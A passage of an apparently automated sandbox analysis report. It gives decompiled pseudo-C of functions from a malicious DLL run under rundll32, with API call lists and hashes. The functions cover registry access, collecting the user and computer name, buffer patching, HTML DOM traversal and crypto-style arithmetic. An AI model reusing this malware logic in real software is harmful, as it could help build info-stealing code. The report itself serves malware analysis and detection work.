                                          				void* _t96;
                                          				void* _t97;
                                          				int _t102;
                                          				signed int* _t104;
                                          				intOrPtr* _t105;
                                          				void* _t106;
                                          
                                          				_t97 = __ecx;
                                          				_v8 = _v8 & 0x00000000;
                                          				_t102 = _a16;
                                          				if(_t102 == 0) {
                                          					__imp__( &_v284,  *0x677d33c);
                                          					_t96 = 0x80000002;
                                          					L6:
                                          					_t60 = E0677A5E9(0,  &_v284);
                                          					_a8 = _t60;
                                          					if(_t60 == 0) {
                                          						_v8 = 8;
                                          						L29:
                                          						_t61 = _a20;
                                          						if(_t61 != 0) {
                                          							 *_t61 =  *_t61 + 1;
                                          						}
                                          						return _v8;
                                          					}
                                          					_t105 = _a24;
                                          					if(E0677621D(_t97, _t105, _t96, _t60) != 0) {
                                          						L27:
                                          						E0677147E(_a8);
                                          						goto L29;
                                          					}
                                          					_t65 =  *0x677d2a4; // 0x4ca5a8
                                          					_t16 = _t65 + 0x677e8de; // 0x65696c43
                                          					_t68 = E0677A5E9(0, _t16);
                                          					_a24 = _t68;
                                          					if(_t68 == 0) {
                                          						L14:
                                          						_t29 = _t105 + 0x14; // 0x102
                                          						_t33 = _t105 + 0x10; // 0x3d0677c0
                                          						if(E06774C9A( *_t33, _t96, _a8,  *0x677d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                          							_t72 =  *0x677d2a4; // 0x4ca5a8
                                          							if(_t102 == 0) {
                                          								_t35 = _t72 + 0x677ea54; // 0x4d4c4b48
                                          								_t73 = _t35;
                                          							} else {
                                          								_t34 = _t72 + 0x677ea4f; // 0x55434b48
                                          								_t73 = _t34;
                                          							}
                                          							if(E067730FC( &_a24, _t73,  *0x677d334,  *0x677d338,  &_a24,  &_a16) == 0) {
                                          								if(_t102 == 0) {
                                          									_t75 =  *0x677d2a4; // 0x4ca5a8
                                          									_t44 = _t75 + 0x677e856; // 0x74666f53
                                          									_t78 = E0677A5E9(0, _t44);
                                          									_t103 = _t78;
                                          									if(_t78 == 0) {
                                          										_v8 = 8;
                                          									} else {
                                          										_t47 = _t105 + 0x10; // 0x3d0677c0
                                          										E06771BC1( *_t47, _t96, _a8,  *0x677d338, _a24);
                                          										_t49 = _t105 + 0x10; // 0x3d0677c0
                                          										E06771BC1( *_t49, _t96, _t103,  *0x677d330, _a16);
                                          										E0677147E(_t103);
                                          									}
                                          								} else {
                                          									_t40 = _t105 + 0x10; // 0x3d0677c0
                                          									E06771BC1( *_t40, _t96, _a8,  *0x677d338, _a24);
                                          									_t43 = _t105 + 0x10; // 0x3d0677c0
                                          									E06771BC1( *_t43, _t96, _a8,  *0x677d330, _a16);
                                          								}
                                          								if( *_t105 != 0) {
                                          									E0677147E(_a24);
                                          								} else {
                                          									 *_t105 = _a16;
                                          								}
                                          							}
                                          						}
                                          						goto L27;
                                          					}
                                          					_t21 = _t105 + 0x10; // 0x3d0677c0
                                          					if(E067774B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                                          						_t104 = _v16;
                                          						_t88 = 0x28;
                                          						if(_v12 == _t88) {
                                          							 *_t104 =  *_t104 & 0x00000000;
                                          							_t26 = _t105 + 0x10; // 0x3d0677c0
                                          							E06774C9A( *_t26, _t96, _a8, _a24, _t104);
                                          						}
                                          						E0677147E(_t104);
                                          						_t102 = _a16;
                                          					}
                                          					E0677147E(_a24);
                                          					goto L14;
                                          				}
                                          				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                          					goto L29;
                                          				} else {
                                          					memcpy( &_v284, _a8, _t102);
                                          					__imp__(_t106 + _t102 - 0x117,  *0x677d33c);
                                          					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                                          					_t96 = 0x80000003;
                                          					goto L6;
                                          				}
                                          			}

                                          APIs
                                          • StrChrA.SHLWAPI(0677553C,0000005F,00000000,00000000,00000104), ref: 0677A675
                                          • memcpy.NTDLL(?,0677553C,?), ref: 0677A68E
                                          • lstrcpy.KERNEL32(?), ref: 0677A6A4
                                            • Part of subcall function 0677A5E9: lstrlen.KERNEL32(?,00000000,0677D330,00000001,0677937A,0677D00C,0677D00C,00000000,00000005,00000000,00000000,?,?,?,0677207E,?), ref: 0677A5F2
                                            • Part of subcall function 0677A5E9: mbstowcs.NTDLL ref: 0677A619
                                            • Part of subcall function 0677A5E9: memset.NTDLL ref: 0677A62B
                                            • Part of subcall function 06771BC1: lstrlenW.KERNEL32(0677553C,?,?,0677A818,3D0677C0,80000002,0677553C,06779642,74666F53,4D4C4B48,06779642,?,3D0677C0,80000002,0677553C,?), ref: 06771BE1
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0677A6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: 78f17da4a81e23b36253f994211a329a39d67d1ec40d1c1f7414ef2a2edbbef3
                                          • Instruction ID: ca527dd61edb63cda3828e11757a1482d0d88fffbec45f8c46a856697ab87458
                                          • Opcode Fuzzy Hash: 78f17da4a81e23b36253f994211a329a39d67d1ec40d1c1f7414ef2a2edbbef3
                                          • Instruction Fuzzy Hash: 9451517290020AEFEFA2AFA0DD44DAE77BAFF04304F048515FA1596164E735D925DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0677614A() {
                                          				long _v8;
                                          				long _v12;
                                          				int _v16;
                                          				long _t39;
                                          				long _t43;
                                          				signed int _t47;
                                          				short _t51;
                                          				signed int _t52;
                                          				int _t56;
                                          				int _t57;
                                          				char* _t64;
                                          				short* _t67;
                                          
                                          				_v16 = 0;
                                          				_v8 = 0;
                                          				GetUserNameW(0,  &_v8);
                                          				_t39 = _v8;
                                          				if(_t39 != 0) {
                                          					_v12 = _t39;
                                          					_v8 = 0;
                                          					GetComputerNameW(0,  &_v8);
                                          					_t43 = _v8;
                                          					if(_t43 != 0) {
                                          						_v12 = _v12 + _t43 + 2;
                                          						_t64 = E067758BE(_v12 + _t43 + 2 << 2);
                                          						if(_t64 != 0) {
                                          							_t47 = _v12;
                                          							_t67 = _t64 + _t47 * 2;
                                          							_v8 = _t47;
                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                          								L7:
                                          								E0677147E(_t64);
                                          							} else {
                                          								_t51 = 0x40;
                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                          								_t52 = _v8;
                                          								_v12 = _v12 - _t52;
                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                          									goto L7;
                                          								} else {
                                          									_t56 = _v12 + _v8;
                                          									_t31 = _t56 + 2; // 0x6775210
                                          									_v12 = _t56;
                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                          									_v8 = _t57;
                                          									if(_t57 == 0) {
                                          										goto L7;
                                          									} else {
                                          										_t64[_t57] = 0;
                                          										_v16 = _t64;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v16;
                                          			}

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,0677520E), ref: 0677615E
                                          • GetComputerNameW.KERNEL32(00000000,0677520E), ref: 0677617A
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • GetUserNameW.ADVAPI32(00000000,0677520E), ref: 067761B4
                                          • GetComputerNameW.KERNEL32(0677520E,?), ref: 067761D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,0677520E,00000000,06775210,00000000,00000000,?,?,0677520E), ref: 067761FA
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 339aec403ee55c0375fd29148359edc9c2e86016e6e0fe83bc79c362565e1e85
                                          • Instruction ID: d7cf35bb3f0cfb4ab7d1f0a1e489e7f14b0f00e6baeffe0aa0def0c68af1932f
                                          • Opcode Fuzzy Hash: 339aec403ee55c0375fd29148359edc9c2e86016e6e0fe83bc79c362565e1e85
                                          • Instruction Fuzzy Hash: 0F21E8B6D00208FFDB51DFE8C984DEEBBBDEF48204B5484AAE601E7204E6309B44DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E067762CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                                          				char _v5;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				char _t28;
                                          				void* _t36;
                                          				void* _t41;
                                          				char* _t42;
                                          				void* _t44;
                                          				void* _t49;
                                          				void* _t50;
                                          				int _t51;
                                          				int _t54;
                                          				void* _t55;
                                          
                                          				_t49 = _a4;
                                          				_t55 = __eax;
                                          				_v12 = 0xb;
                                          				if(_t49 != 0 && __eax != 0) {
                                          					_t5 = _t55 - 1; // -1
                                          					_t42 = _t49 + _t5;
                                          					_t28 =  *_t42;
                                          					_v5 = _t28;
                                          					 *_t42 = 0;
                                          					__imp__(_a8, _t41);
                                          					_v16 = _t28;
                                          					_t50 =  *0x677d114(_t49, _a8);
                                          					if(_t50 != 0) {
                                          						 *_t42 = _v5;
                                          						_t44 = RtlAllocateHeap( *0x677d238, 0, _a16 + __eax);
                                          						if(_t44 == 0) {
                                          							_v12 = 8;
                                          						} else {
                                          							_t51 = _t50 - _a4;
                                          							memcpy(_t44, _a4, _t51);
                                          							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                                          							_t45 = _v16;
                                          							_t54 = _a16;
                                          							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                                          							 *_a20 = _t44;
                                          							_v12 = _v12 & 0x00000000;
                                          							 *_a24 = _t55 - _v16 + _t54;
                                          						}
                                          					}
                                          				}
                                          				return _v12;
                                          			}
















                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 06776301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0677632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 06776341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 06776350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 0677636B
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: d00f007caa7040e4351494f3e02436f80fb4e75009f27c52792c9a0287ea22ea
                                          • Instruction ID: 6ed900bbdf8eed4a6b54735d79608273e0428b2956d43a9ff493252333d7448d
                                          • Opcode Fuzzy Hash: d00f007caa7040e4351494f3e02436f80fb4e75009f27c52792c9a0287ea22ea
                                          • Instruction Fuzzy Hash: 41219076900209AFCF129F68CC48AEEBFBAEF85704F058054ED54AB308D731E915CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E06779FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                          				void* __esi;
                                          				long _t10;
                                          				void* _t18;
                                          				void* _t22;
                                          
                                          				_t9 = __eax;
                                          				_t22 = __eax;
                                          				if(_a4 != 0 && E06776B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                          					L9:
                                          					return GetLastError();
                                          				}
                                          				_t10 = E0677A96C(_t9, _t18, _t22, _a8);
                                          				if(_t10 == 0) {
                                          					ResetEvent( *(_t22 + 0x1c));
                                          					ResetEvent( *(_t22 + 0x20));
                                          					_push(0);
                                          					_push(0);
                                          					_push(0xffffffff);
                                          					_push(0);
                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                          					if( *0x677d12c() != 0) {
                                          						SetEvent( *(_t22 + 0x1c));
                                          						goto L7;
                                          					} else {
                                          						_t10 = GetLastError();
                                          						if(_t10 == 0x3e5) {
                                          							L7:
                                          							_t10 = 0;
                                          						}
                                          					}
                                          				}
                                          				if(_t10 == 0xffffffff) {
                                          					goto L9;
                                          				}
                                          				return _t10;
                                          			}







                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,067766AF,?,?,00000000,00000000), ref: 0677A021
                                          • ResetEvent.KERNEL32(?), ref: 0677A026
                                          • GetLastError.KERNEL32 ref: 0677A03E
                                          • GetLastError.KERNEL32(?,?,00000102,067766AF,?,?,00000000,00000000), ref: 0677A059
                                            • Part of subcall function 06776B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,0677A006,?,?,?,?,00000102,067766AF,?,?,00000000), ref: 06776B7A
                                            • Part of subcall function 06776B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0677A006,?,?,?,?,00000102,067766AF,?), ref: 06776BD8
                                            • Part of subcall function 06776B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 06776BE8
                                          • SetEvent.KERNEL32(?), ref: 0677A04C
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: afd0a5854209d878b267067cc4225ee25052926a22d31703cb93c8235ea1da28
                                          • Instruction ID: 55420bc9407e110de31f337cddfbdd2dc07fd92f4365c1d13b02855d914b408b
                                          • Opcode Fuzzy Hash: afd0a5854209d878b267067cc4225ee25052926a22d31703cb93c8235ea1da28
                                          • Instruction Fuzzy Hash: 1B014B31620200ABEE716A71DC44F6FB7AAEF49764F218E24F751D10E0E622E815DAA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E06776A7F(intOrPtr _a4) {
                                          				void* _t2;
                                          				unsigned int _t4;
                                          				void* _t5;
                                          				long _t6;
                                          				void* _t7;
                                          				void* _t15;
                                          
                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                          				 *0x677d26c = _t2;
                                          				if(_t2 == 0) {
                                          					return GetLastError();
                                          				}
                                          				_t4 = GetVersion();
                                          				if(_t4 != 5) {
                                          					L4:
                                          					if(_t15 <= 0) {
                                          						_t5 = 0x32;
                                          						return _t5;
                                          					}
                                          					L5:
                                          					 *0x677d25c = _t4;
                                          					_t6 = GetCurrentProcessId();
                                          					 *0x677d258 = _t6;
                                          					 *0x677d264 = _a4;
                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                          					 *0x677d254 = _t7;
                                          					if(_t7 == 0) {
                                          						 *0x677d254 =  *0x677d254 | 0xffffffff;
                                          					}
                                          					return 0;
                                          				}
                                          				if(_t4 >> 8 > 0) {
                                          					goto L5;
                                          				}
                                          				_t15 = _t4 - _t4;
                                          				goto L4;
                                          			}









                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,067790D2,?), ref: 06776A87
                                          • GetVersion.KERNEL32 ref: 06776A96
                                          • GetCurrentProcessId.KERNEL32 ref: 06776AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 06776ACF
                                          • GetLastError.KERNEL32 ref: 06776AEE
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: 79d481eb9d2fdcee13df9241fcb8caab21d2391e40527be7454f4ae6dfe028a7
                                          • Instruction ID: 19d37e36b04ea30c563befeb09325ffa7c302f382915a2b45d3cb92864e8559c
                                          • Opcode Fuzzy Hash: 79d481eb9d2fdcee13df9241fcb8caab21d2391e40527be7454f4ae6dfe028a7
                                          • Instruction Fuzzy Hash: 28F08CB0A607029FDB61CF64AC0AB253B62AF48741F11C01AE742C61DCD670C046CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E067791B5(intOrPtr* __eax) {
                                          				void* _v8;
                                          				WCHAR* _v12;
                                          				void* _v16;
                                          				char _v20;
                                          				void* _v24;
                                          				intOrPtr _v28;
                                          				void* _v32;
                                          				intOrPtr _v40;
                                          				short _v48;
                                          				intOrPtr _v56;
                                          				short _v64;
                                          				intOrPtr* _t54;
                                          				intOrPtr* _t56;
                                          				intOrPtr _t57;
                                          				intOrPtr* _t58;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          				intOrPtr* _t63;
                                          				intOrPtr* _t65;
                                          				short _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t70;
                                          				intOrPtr* _t72;
                                          				intOrPtr* _t75;
                                          				intOrPtr* _t77;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t87;
                                          				intOrPtr _t103;
                                          				intOrPtr _t109;
                                          				void* _t118;
                                          				void* _t122;
                                          				void* _t123;
                                          				intOrPtr _t130;
                                          
                                          				_t123 = _t122 - 0x3c;
                                          				_push( &_v8);
                                          				_push(__eax);
                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                          				if(_t118 >= 0) {
                                          					_t54 = _v8;
                                          					_t103 =  *0x677d2a4; // 0x4ca5a8
                                          					_t5 = _t103 + 0x677e038; // 0x3050f485
                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                          					_t56 = _v8;
                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                          					if(_t118 >= 0) {
                                          						__imp__#2(0x677c298);
                                          						_v28 = _t57;
                                          						if(_t57 == 0) {
                                          							_t118 = 0x8007000e;
                                          						} else {
                                          							_t60 = _v32;
                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                          							_t87 = __imp__#6;
                                          							_t118 = _t61;
                                          							if(_t118 >= 0) {
                                          								_t63 = _v24;
                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                          								if(_t118 >= 0) {
                                          									_t130 = _v20;
                                          									if(_t130 != 0) {
                                          										_t67 = 3;
                                          										_v64 = _t67;
                                          										_v48 = _t67;
                                          										_v56 = 0;
                                          										_v40 = 0;
                                          										if(_t130 > 0) {
                                          											while(1) {
                                          												_t68 = _v24;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t123 = _t123;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                          												if(_t118 < 0) {
                                          													goto L16;
                                          												}
                                          												_t70 = _v8;
                                          												_t109 =  *0x677d2a4; // 0x4ca5a8
                                          												_t28 = _t109 + 0x677e0bc; // 0x3050f1ff
                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                          												if(_t118 >= 0) {
                                          													_t75 = _v16;
                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                          													if(_t118 >= 0 && _v12 != 0) {
                                          														_t79 =  *0x677d2a4; // 0x4ca5a8
                                          														_t33 = _t79 + 0x677e078; // 0x76006f
                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                          															_t83 = _v16;
                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                          														}
                                          														 *_t87(_v12);
                                          													}
                                          													_t77 = _v16;
                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                          												}
                                          												_t72 = _v8;
                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                          												_v40 = _v40 + 1;
                                          												if(_v40 < _v20) {
                                          													continue;
                                          												}
                                          												goto L16;
                                          											}
                                          										}
                                          									}
                                          								}
                                          								L16:
                                          								_t65 = _v24;
                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                          							}
                                          							 *_t87(_v28);
                                          						}
                                          						_t58 = _v32;
                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                          					}
                                          				}
                                          				return _t118;
                                          			}





































                                          APIs
                                          • SysAllocString.OLEAUT32(0677C298), ref: 06779205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 067792E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 067792FF
                                          • SysFreeString.OLEAUT32(?), ref: 0677932E
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: fbb251897309ad9fabe0258bcaa5fc292c886ff6a35d9c06a64eaa54b376983a
                                          • Instruction ID: ad5b458c815cd313da7a20862bba0cb38fb1e2ffb5b6f442ecb557a3908c7086
                                          • Opcode Fuzzy Hash: fbb251897309ad9fabe0258bcaa5fc292c886ff6a35d9c06a64eaa54b376983a
                                          • Instruction Fuzzy Hash: F2513E75D00519EFCF01DFA8C888DAEB7BAEF89704B148594EA19EB254D7319D42CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E06777664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				void _v92;
                                          				void _v236;
                                          				void* _t55;
                                          				unsigned int _t56;
                                          				signed int _t66;
                                          				signed int _t74;
                                          				void* _t76;
                                          				signed int _t79;
                                          				void* _t81;
                                          				void* _t92;
                                          				void* _t96;
                                          				signed int* _t99;
                                          				signed int _t101;
                                          				signed int _t103;
                                          				void* _t107;
                                          
                                          				_t92 = _a12;
                                          				_t101 = __eax;
                                          				_t55 = E067748F0(_a16, _t92);
                                          				_t79 = _t55;
                                          				if(_t79 == 0) {
                                          					L18:
                                          					return _t55;
                                          				}
                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                          				_t81 = 0;
                                          				_t96 = 0x20;
                                          				if(_t56 == 0) {
                                          					L4:
                                          					_t97 = _t96 - _t81;
                                          					_v12 = _t96 - _t81;
                                          					E0677748A(_t79,  &_v236);
                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E06777074(_t101,  &_v236, _a8, _t96 - _t81);
                                          					E06777074(_t79,  &_v92, _a12, _t97);
                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                          					_t66 = E0677748A(_t101, 0x677d1b0);
                                          					_t103 = _t101 - _t79;
                                          					_a8 = _t103;
                                          					if(_t103 < 0) {
                                          						L17:
                                          						E0677748A(_a16, _a4);
                                          						E06772FED(_t79,  &_v236, _a4, _t97);
                                          						memset( &_v236, 0, 0x8c);
                                          						_t55 = memset( &_v92, 0, 0x44);
                                          						goto L18;
                                          					}
                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                          					do {
                                          						if(_v8 != 0xffffffff) {
                                          							_push(1);
                                          							_push(0);
                                          							_push(0);
                                          							_push( *_t99);
                                          							L0677B088();
                                          							_t74 = _t66 +  *(_t99 - 4);
                                          							asm("adc edx, esi");
                                          							_push(0);
                                          							_push(_v8 + 1);
                                          							_push(_t92);
                                          							_push(_t74);
                                          							L0677B082();
                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                          								_t74 = _t74 | 0xffffffff;
                                          								_v16 = _v16 & 0x00000000;
                                          							}
                                          						} else {
                                          							_t74 =  *_t99;
                                          						}
                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                          						_a12 = _t74;
                                          						_t76 = E06776FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                          						while(1) {
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							L13:
                                          							_t92 =  &_v92;
                                          							if(E067715CE(_t79, _t92, _t106) < 0) {
                                          								break;
                                          							}
                                          							L14:
                                          							_a12 = _a12 + 1;
                                          							_t76 = E0677687D(_t79,  &_v92, _t106, _t106);
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							goto L13;
                                          						}
                                          						_a8 = _a8 - 1;
                                          						_t66 = _a12;
                                          						_t99 = _t99 - 4;
                                          						 *(0x677d1b0 + _a8 * 4) = _t66;
                                          					} while (_a8 >= 0);
                                          					_t97 = _v12;
                                          					goto L17;
                                          				}
                                          				while(_t81 < _t96) {
                                          					_t81 = _t81 + 1;
                                          					_t56 = _t56 >> 1;
                                          					if(_t56 != 0) {
                                          						continue;
                                          					}
                                          					goto L4;
                                          				}
                                          				goto L4;
                                          			}


                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 06777711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 06777727
                                          • memset.NTDLL ref: 067777C7
                                          • memset.NTDLL ref: 067777D7
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: 1ac00fc5871e27231bcd3153e212946f6bb607231433a8f7236122ed9e8ef6f4
                                          • Instruction ID: b49b18568d59fcdd8597e177424c04050488212647cce1b179b4c61fba74a8aa
                                          • Opcode Fuzzy Hash: 1ac00fc5871e27231bcd3153e212946f6bb607231433a8f7236122ed9e8ef6f4
                                          • Instruction Fuzzy Hash: 63419531A00249ABDF94DFA8CC84BEE7775EF45710F108529FA25AB184EB719A54CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 0677A97E
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • ResetEvent.KERNEL32(?), ref: 0677A9F2
